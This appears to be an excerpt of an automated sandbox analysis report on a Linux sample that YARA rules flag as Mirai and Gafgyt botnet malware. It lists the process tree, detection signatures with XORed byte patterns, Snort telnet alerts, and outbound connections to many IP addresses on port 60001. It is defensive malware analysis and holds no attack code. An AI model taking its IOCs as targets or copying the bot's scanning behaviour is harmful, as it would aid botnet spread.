  • whoopsie (PID: 5750, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5757, Parent: 1)
  • dbus-daemon (PID: 5757, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5762, Parent: 1)
  • gpu-manager (PID: 5762, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5820, Parent: 5762, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5821, Parent: 5820)
      • grep (PID: 5821, Parent: 5820, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5822, Parent: 5762, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5823, Parent: 5822)
      • grep (PID: 5823, Parent: 5822, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5824, Parent: 5762, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5825, Parent: 5824)
      • grep (PID: 5825, Parent: 5824, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5827, Parent: 5762, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5828, Parent: 5827)
      • grep (PID: 5828, Parent: 5827, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5830, Parent: 5762, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5831, Parent: 5830)
      • grep (PID: 5831, Parent: 5830, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5832, Parent: 5762, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5833, Parent: 5832)
      • grep (PID: 5833, Parent: 5832, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5837, Parent: 5762, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5838, Parent: 5837)
      • grep (PID: 5838, Parent: 5837, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5839, Parent: 5762, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5840, Parent: 5839)
      • grep (PID: 5840, Parent: 5839, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5763, Parent: 1)
  • systemd-logind (PID: 5763, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5841, Parent: 1)
  • generate-config (PID: 5841, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5842, Parent: 5841, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5843, Parent: 1)
  • rsyslogd (PID: 5843, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5849, Parent: 1)
  • agetty (PID: 5849, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5850, Parent: 1)
  • systemd-journald (PID: 5850, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5851, Parent: 1)
  • gdm-wait-for-drm (PID: 5851, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 5852, Parent: 1)
  • whoopsie (PID: 5852, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5854, Parent: 1)
  • dbus-daemon (PID: 5854, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5857, Parent: 1)
  • systemd-logind (PID: 5857, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5917, Parent: 1)
  • rsyslogd (PID: 5917, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5924, Parent: 1)
  • agetty (PID: 5924, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5925, Parent: 1)
  • systemd-journald (PID: 5925, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5926, Parent: 1)
  • gpu-manager (PID: 5926, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5927, Parent: 5926, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5928, Parent: 5927)
      • grep (PID: 5928, Parent: 5927, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5930, Parent: 5926, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5931, Parent: 5930)
      • grep (PID: 5931, Parent: 5930, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5934, Parent: 5926, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5935, Parent: 5934)
      • grep (PID: 5935, Parent: 5934, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5936, Parent: 5926, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5938, Parent: 5936)
      • grep (PID: 5938, Parent: 5936, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5940, Parent: 5926, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5942, Parent: 5940)
      • grep (PID: 5942, Parent: 5940, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5943, Parent: 5926, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5944, Parent: 5943)
      • grep (PID: 5944, Parent: 5943, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5949, Parent: 5926, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5950, Parent: 5949)
      • grep (PID: 5950, Parent: 5949, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5951, Parent: 5926, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5952, Parent: 5951)
      • grep (PID: 5952, Parent: 5951, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5929, Parent: 1)
  • whoopsie (PID: 5929, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5947, Parent: 1860)
  • dbus-daemon (PID: 5947, Parent: 1860, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5948, Parent: 1860)
  • pulseaudio (PID: 5948, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5953, Parent: 1)
  • rtkit-daemon (PID: 5953, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5956, Parent: 1)
  • dbus-daemon (PID: 5956, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5961, Parent: 1)
  • systemd-logind (PID: 5961, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 6018, Parent: 1)
  • generate-config (PID: 6018, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 6019, Parent: 6018, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 6020, Parent: 1)
  • rtkit-daemon (PID: 6020, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 6021, Parent: 1)
  • rsyslogd (PID: 6021, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 6024, Parent: 1)
  • polkitd (PID: 6024, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 6025, Parent: 1)
  • agetty (PID: 6025, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 6029, Parent: 1)
  • whoopsie (PID: 6029, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 6033, Parent: 1)
  • systemd-journald (PID: 6033, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 6040, Parent: 1)
  • gdm-wait-for-drm (PID: 6040, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 6041, Parent: 1860)
  • pulseaudio (PID: 6041, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 6046, Parent: 1860)
  • dbus-daemon (PID: 6046, Parent: 1860, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 6049, Parent: 1)
  • whoopsie (PID: 6049, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 6052, Parent: 1)
  • systemd-logind (PID: 6052, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 6110, Parent: 1)
  • dbus-daemon (PID: 6110, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • cleanup

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
nSg5RM0w0d | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x1354a:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x135b9:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x13628:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x13696:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x13704:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x13966:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x139b8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x13a0a:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x13a5c:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x13aaf:$xo1: oMXKNNC\x0D\x17\x0C\x12
nSg5RM0w0d | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security
nSg5RM0w0d | JoeSecurity_Mirai_9 | Yara detected Mirai | Joe Security
nSg5RM0w0d | JoeSecurity_Gafgyt | Yara detected Gafgyt | Joe Security

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Mirai_12 | Yara detected Mirai | Joe Security

Memory Dumps

Source | Rule | Description | Author | Strings
5281.1.00000000bae8d7b5.000000001aa4a697.rw-.sdmp | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x54a:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x5b9:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x628:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x696:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x704:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x966:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x9b8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xa0a:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xa5c:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xaaf:$xo1: oMXKNNC\x0D\x17\x0C\x12
5294.1.00000000bae8d7b5.000000001aa4a697.rw-.sdmp | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x54a:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x5b9:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x628:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x696:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x704:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x966:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x9b8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xa0a:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xa5c:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xaaf:$xo1: oMXKNNC\x0D\x17\x0C\x12
5278.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x1354a:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x135b9:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x13628:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x13696:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x13704:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x13966:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x139b8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x13a0a:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x13a5c:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x13aaf:$xo1: oMXKNNC\x0D\x17\x0C\x12
5278.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security
5278.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp | JoeSecurity_Mirai_9 | Yara detected Mirai | Joe Security

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: nSg5RM0w0d ReversingLabs: Detection: 55%
Source: /usr/bin/pulseaudio (PID: 5386) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5492) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5661) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5842) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 5948) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6019) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 6041) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: unknown HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35442 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36684 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36688 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36690 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36692 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36694 version: TLS 1.2

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 716 INFO TELNET access 124.114.140.102:23 -> 192.168.2.23:55138
Source: Traffic Snort IDS: 716 INFO TELNET access 124.114.140.102:23 -> 192.168.2.23:55186
Source: Traffic Snort IDS: 716 INFO TELNET access 124.114.140.102:23 -> 192.168.2.23:55280
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 188.247.187.146:23 -> 192.168.2.23:36002
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 188.247.187.146:23 -> 192.168.2.23:36002
Source: Traffic Snort IDS: 716 INFO TELNET access 124.114.140.102:23 -> 192.168.2.23:55296
Source: Traffic Snort IDS: 716 INFO TELNET access 41.180.146.95:23 -> 192.168.2.23:40958
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 104.244.72.234 ports 64938,3,4,6,8,9
Uses known network protocols on non-standard ports
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 47.87.41.215:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 135.74.100.27:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 97.125.9.11:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 149.43.19.21:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 129.220.67.4:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 114.107.138.185:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 152.62.163.72:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 121.101.226.122:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 162.172.24.204:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 222.24.224.54:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 141.162.57.187:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 118.8.148.22:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 166.16.135.196:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 152.250.207.34:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 23.236.26.230:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 85.247.181.104:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 133.98.166.233:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 74.208.31.9:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 20.127.201.152:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 194.250.248.90:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 87.221.211.81:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 77.11.105.244:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 110.196.71.213:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 54.235.34.214:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 164.34.2.113:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 112.101.44.163:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 109.132.142.101:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 105.107.224.107:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 131.126.43.123:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 112.106.78.103:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 117.19.251.194:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 92.121.123.23:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 40.60.150.103:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 32.63.131.9:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 60.71.28.213:60001
